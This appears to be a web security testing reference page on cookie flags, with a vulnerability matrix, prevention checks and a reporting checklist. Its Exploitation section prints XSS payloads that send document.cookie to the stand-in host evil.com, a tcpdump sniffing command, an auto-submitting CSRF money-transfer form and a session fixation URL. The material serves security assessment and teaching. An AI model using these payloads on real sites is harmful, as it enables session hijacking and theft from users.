Cookie Security

Overview

Cookies carry session tokens, auth data, and preferences. Missing or misconfigured flags expose them to theft, fixation, and cross-site attacks.

Check Cookies

curl -s -I https://TARGET/login -d "user=admin&pass=test" | grep -i "set-cookie"

Browser DevTools

Application → Cookies → inspect flags per cookie.

HttpOnly

Set-Cookie: session=abc123; HttpOnly

Status	Risk
Present	Cookie not accessible via `document.cookie`
Missing	XSS can steal session: `<script>fetch('https://evil.com/?c='+document.cookie)</script>`

Secure

Set-Cookie: session=abc123; Secure

Status	Risk
Present	Cookie only sent over HTTPS
Missing	Cookie sent over HTTP → MITM interception. Attacker on same network sniffs cookie in plaintext

SameSite

Set-Cookie: session=abc123; SameSite=Strict
Set-Cookie: session=abc123; SameSite=Lax
Set-Cookie: session=abc123; SameSite=None; Secure

Value	Behavior	CSRF Risk
`Strict`	Never sent cross-site	Protected
`Lax`	Sent on top-level GET navigations	Partial — GET-based CSRF possible
`None`	Always sent (requires `Secure`)	Vulnerable to CSRF
Missing	Browser default (`Lax` in modern browsers)	Depends on browser

Domain

Set-Cookie: session=abc123; Domain=.target.com

Config	Scope
`Domain=.target.com`	Cookie shared with ALL subdomains
No Domain attribute	Cookie only for exact domain

Risk: Broad domain scope → XSS on any subdomain can steal cookie.

Path

Set-Cookie: admin=token; Path=/admin

Config	Scope
`Path=/admin`	Only sent for `/admin/*` requests
`Path=/`	Sent for all paths

Risk: Path is NOT a security boundary — JavaScript from other paths can read it via iframe tricks.

Expires / Max-Age

Set-Cookie: session=abc123; Max-Age=3600
Set-Cookie: session=abc123; Expires=Thu, 01 Jan 2026 00:00:00 GMT

Config	Risk
No expiry (session cookie)	Deleted when browser closes
Long expiry	Stolen cookie valid for extended period
Very long (years)	Persistent session even after password change

Vulnerability Matrix

Missing Flag	Attack
No HttpOnly	XSS → `document.cookie` theft
No Secure	MITM → sniff cookie over HTTP
SameSite=None	CSRF attacks
Domain=.target.com	Subdomain XSS → cookie theft
No expiry control	Long-lived stolen sessions
All flags missing	All of the above

Exploitation

<script>
fetch('https://evil.com/steal?c=' + document.cookie);
</script>

<script>
new Image().src = 'https://evil.com/steal?c=' + document.cookie;
</script>

<img src=x onerror="fetch('https://evil.com/?c='+document.cookie)">

# MITM on network
# Cookie sent in plaintext over HTTP
tcpdump -i eth0 -A -s 0 'tcp port 80' | grep -i "cookie"

CSRF (SameSite=None)

<form action="https://TARGET/transfer" method="POST">
    <input type="hidden" name="to" value="attacker">
    <input type="hidden" name="amount" value="10000">
</form>
<script>document.forms[0].submit();</script>

If Domain=.target.com and XSS on blog.target.com:

<!-- On blog.target.com -->
<script>
fetch('https://evil.com/steal?c=' + document.cookie);
// Receives cookies scoped to .target.com
</script>

Session Fixation

If application accepts session ID from URL or doesn’t regenerate after login:

https://TARGET/login?session=ATTACKER_KNOWN_SESSION

Victim logs in → attacker uses known session ID.

Prevention Check

Login with session X
After login, check if session ID changed
If same → session fixation vulnerable

Modern browsers support special prefixes:

Prefix	Requirements
`__Secure-`	Must have `Secure` flag, sent over HTTPS
`__Host-`	Must have `Secure`, no `Domain`, `Path=/`

Set-Cookie: __Host-session=abc123; Secure; Path=/

__Host- prevents subdomain and path scoping attacks.

Reporting Checklist

Check	Finding
HttpOnly missing on session cookie	Session hijacking via XSS
Secure flag missing	Cookie exposure over HTTP
SameSite=None or missing	CSRF vulnerability
Broad Domain scope	Subdomain attack surface
No session regeneration after login	Session fixation
Long/no expiration	Persistent stolen sessions
Cookie prefixes not used	Missing defense-in-depth

Quick Reference

Flag	Secure Value	Risk Without
HttpOnly	Present	XSS cookie theft
Secure	Present	MITM sniffing
SameSite	Strict or Lax	CSRF
Domain	Omit or exact	Subdomain attacks
Path	`/` (not security boundary)	N/A
Expiry	Short / session	Persistent compromise

Documentation Index

​Overview

​Check Cookies

​Browser DevTools

​Cookie Flags

​HttpOnly

​Secure

​SameSite

​Domain

​Path

​Expires / Max-Age

​Vulnerability Matrix

​Exploitation

​Steal Cookie via XSS (No HttpOnly)

​Sniff Cookie (No Secure Flag)

​CSRF (SameSite=None)

​Subdomain Cookie Theft (Broad Domain)

​Session Fixation

​Prevention Check

​Cookie Prefixes

​Reporting Checklist

​Quick Reference

​Sources